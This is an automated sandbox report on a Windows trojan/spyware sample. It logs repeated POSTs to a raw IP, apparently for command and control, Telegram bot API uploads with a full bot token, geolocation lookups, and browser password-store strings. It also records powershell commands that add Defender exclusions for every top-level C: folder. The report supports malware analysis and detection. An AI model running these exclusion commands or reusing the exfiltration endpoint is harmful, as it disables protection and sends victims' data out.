                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2548Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2140Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2544Expect: 100-continue
                            Source: unknownTCP traffic detected without corresponding DNS query: 5.42.66.51
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002ACB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ymail.google.com;example.com;any.domain.net;youtube.com;www.youtube.com;store.steampowered.com;steampowered.com;steam.com; equals www.youtube.com (Youtube)
                            Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                            Source: unknownHTTP traffic detected: POST /bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="34997188-a42f-41eb-990d-cfd33339eec7"Host: api.telegram.orgContent-Length: 86200Expect: 100-continueConnection: Keep-Alive
                            Source: powershell.exe, 00000040.00000002.2903448372.00000164CC7BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                            Source: powershell.exe, 00000040.00000002.2903448372.00000164CC7BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2260842550.000000001D838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                            Source: svchost.exe, 0000004F.00000003.2444686605.000001C427480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                            Source: powershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000002.00000002.2286246823.0000018037D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984329000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E3AE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E22068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E13F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2286246823.0000018037B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E38C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E21E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E11D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.3219775689.000001F6120B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2886040639.0000018180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.3511417406.0000016822BD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.3259951458.0000019354D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.3268697288.000002A1BE461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000040.00000002.3495706955.00000164CE721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.3507396549.000001B712461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2882983145.000001F700001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000002.00000002.2286246823.0000018037D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984329000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E3AE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E22068000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E13F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCF67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000002.00000002.2286246823.0000018037B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2274378069.000001E800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2288795317.000001C5B1211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2317980485.000001F984118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2302011903.00000239E38C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2288980593.0000016E21E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2322173796.00000232E11D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301992566.000001FDA2231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2274595482.0000024700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2289717560.000001F8D4AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2303019914.00000251BCD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2303795968.00000293B2821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.3219775689.000001F6120B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2886040639.0000018180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.3511417406.0000016822BD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.3259951458.0000019354D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.3268697288.000002A1BE461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.3495706955.00000164CE721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000042.00000002.3507396549.000001B712461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.2882983145.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2899814464.0000023F8001F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002BA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto
                            Source: svchost.exe, 0000004F.00000003.2444686605.000001C4274F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                            Source: svchost.exe, 0000004F.00000003.2444686605.000001C427480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                            Source: powershell.exe, 00000046.00000002.2899814464.0000023F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: https://ipinfo.io/country
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2225670983.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                            Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWindow created: window name: CLIPBRDWNDCLASS
                            Source: powershell.exeProcess created: 44
                            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 0_2_00007FF848DF0D670_2_00007FF848DF0D67
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 0_2_00007FF848FA074D0_2_00007FF848FA074D
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeCode function: 0_2_00007FF848FA5FF50_2_00007FF848FA5FF5
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeCode function: 53_2_00007FF848E20D6753_2_00007FF848E20D67
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\ArFrORkS.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257666854.000000001B332000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2257536514.000000001B322000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, B3txKmJG66b3TvIggSB.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@89/164@2/4
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\fTGLCVSM.log
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8884:120:WilError_03
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeMutant created: \Sessions\1\BaseNamedObjects\Local\db37e7674e0c9c73d718eed222877e169116f5b2c083f00aedc6dc96849528f8
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\AppData\Local\Temp\ZQ41MPITjV
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat"
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File read: C:\Users\desktop.ini
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: 0L4O4hE8bk.36.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeReversingLabs: Detection: 87%
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File read: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                            Source: unknownProcess created: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe "C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe"
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
